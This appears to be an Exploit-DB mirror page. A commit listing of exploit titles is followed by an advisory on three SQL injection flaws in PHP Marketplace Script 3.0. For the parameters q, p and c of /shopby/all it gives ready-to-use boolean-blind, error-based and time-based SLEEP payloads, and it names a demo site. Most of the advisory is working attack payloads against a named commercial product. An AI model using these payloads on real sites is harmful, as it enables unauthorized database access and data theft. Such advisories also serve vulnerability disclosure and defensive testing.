exploit-db-mirror/platforms/php/webapps/41329.txt
Offensive Security d548da5f4f DB: 2017-02-14
20 new exploits

Nokia N95-8 - browser (setAttributeNode) Method Crash
Nokia N95-8 browser - 'setAttributeNode' Method Crash

Got All Media 7.0.0.3 - (t00t) Remote Denial of Service
Got All Media 7.0.0.3 - Remote Denial of Service

GeoVision Digital Video Surveillance System - (geohttpserver) DT
GeoVision Digital Video Surveillance System 8.2 - Arbitrary File Disclosure

pHNews alpha 1 - (templates_dir) Remote Code Execution
pHNews alpha 1 - 'templates_dir' Parameter Remote Code Execution
Bloggeruniverse 2.0 Beta - 'editcomments.php id' SQL Injection
Den Dating 9.01 - 'searchmatch.php' SQL Injection
InselPhoto 1.1 - (query) SQL Injection
PHP Krazy Image Host Script 1.01 - 'viewer.php id' SQL Injection
Bloggeruniverse 2.0 Beta - 'id' Parameter SQL Injection
Den Dating 9.01 - 'txtlookgender' Parameter SQL Injection
InselPhoto 1.1 - 'query' Parameter SQL Injection
PHP Krazy Image Host Script 1.01 - 'id' Parameter SQL Injection

Vlinks 1.1.6 - 'id' SQL Injection
Vlinks 1.1.6 - 'id' Parameter SQL Injection
CmsFaethon 2.2.0 - info.php item SQL Command Injection
InselPhoto 1.1 - Persistent Cross-Site Scripting
CmsFaethon 2.2.0 - 'item' Parameter SQL Injection
InselPhoto 1.1 - Cross-Site Scripting
SAS Hotel Management System - 'myhotel_info.asp' SQL Injection
YACS CMS 8.11 - update_trailer.php Remote File Inclusion
SAS Hotel Management System - 'id' Parameter SQL Injection
YACS CMS 8.11 - 'update_trailer.php' Remote File Inclusion

pHNews Alpha 1 - 'header.php mod' SQL Injection
pHNews Alpha 1 - 'mod' Parameter SQL Injection

Novaboard 1.0.1 - (message) Persistent Cross-Site Scripting
Novaboard 1.0.1 - Cross-Site Scripting

Joomla! Component JE Quiz - Blind SQL Injection
Joomla! Component JE Quiz - 'eid' Parameter Blind SQL Injection

SAS Hotel Management System - user_login.asp SQL Injection
SAS Hotel Management System - 'notfound' Parameter SQL Injection

JE Messenger 1.0 - Arbitrary File Upload
Joomla! Component JE Messenger 1.0 - Arbitrary File Upload

Joomla! Component 'com_jeauto' - Local File Inclusion
Joomla! Component JE Auto - Local File Inclusion

vlinks 2.0.3 - 'site.php id Parameter' SQL Injection
Vlinks 2.0.3 - 'id' Parameter SQL Injection

Yacs CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Inclusion
YACS CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Inclusion

Joomla! Component Soccer Bet 4.1.5 - 'userid' Parameter SQL Injection
PHP Marketplace Script - SQL Injection
Joomla! Component JE Classify Ads 1.2 - 'pro_id' Parameter SQL Injection
Joomla! Component JE Gallery 1.3 - 'photo_id' Parameter SQL Injection
Joomla! Component JE Directory 1.7 - 'ditemid' Parameter SQL Injection
Joomla! Component JE QuoteForm - 'Itemid' Parameter SQL Injection
Joomla! Component JE Property Finder 1.6.3 - SQL Injection
Joomla! Component JE Tour 2.0 - SQL Injection
Joomla! Component JE Video Rate 1.0 - SQL Injection
Joomla! Component JE auction 1.6 - 'eid' Parameter SQL Injection
Joomla! Component JE Auto 1.5 - 'd_itemid' Parameter SQL Injection
Joomla! Component JE Awd Song 1.8 - SQL Injection
Joomla! Component Hbooking 1.9.9 - 'h_id' Parameter SQL Injection
Joomla! Component JE Quiz 2.3 - SQL Injection
Joomla! Component JE Grid Folio - 'id' Parameter SQL Injection
Joomla! Component JE K2 Multiple Form Story 1.3 - 'Itemid' Parameter SQL Injection
Joomla! Component JE Form Creator 1.8 - 'Itemid' Parameter SQL Injection
Joomla! Component JE Portfolio Creator 1.2 - 'd_itemid' Parameter SQL Injection
Joomla! Component JE Ticket System 1.2 - SQL Injection
Joomla! Component JE Messanger - SQL Injection
2017-02-14 05:01:17 +00:00

60 lines
2.5 KiB
Text
Executable file

# Exploit Title : PHP Marketplace Script - Multiple SQL Injection Vulnerabilities
# Author : Yunus YILDIRIM (Th3GundY)
# Team : CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
# Website : http://www.yunus.ninja
# Contact : yunusyildirim@protonmail.com
# Vendor Homepage : http://www.ecommercemix.com/
# Software Link : http://ecommercemix.com/php-marketplace-script/
# Vuln. Version : 3.0
# Demo : http://pleasureriver.com
# # # # DETAILS # # # #
SQL Injections :
# 1
http://localhost/shopby/all?q=gundy
Parameter: q (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: q=LIEQ") OR NOT 5305=5305#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: q=LIEQ") AND (SELECT 7200 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(7200=7200,1))),0x7176766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("SRxl"="SRxl
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (comment)
Payload: q=LIEQ") OR SLEEP(5)#
# 2
http://localhost/shopby/all?p=31
Parameter: p (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: p=31") OR NOT 6681=6681#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: p=31") AND (SELECT 4760 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(4760=4760,1))),0x7176766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("eFds"="eFds
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: p=31") AND SLEEP(5) AND ("kxQU"="kxQU
# 3
http://localhost/shopby/all?c=Turkey
Parameter: c (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: c=Turkey' AND 9145=9145 AND 'tvKB'='tvKB
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: c=Turkey' AND (SELECT 5928 FROM(SELECT COUNT(*),CONCAT(0x7176767071,(SELECT (ELT(5928=5928,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'APFD'='APFD
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: c=Turkey' AND SLEEP(5) AND 'rmia'='rmia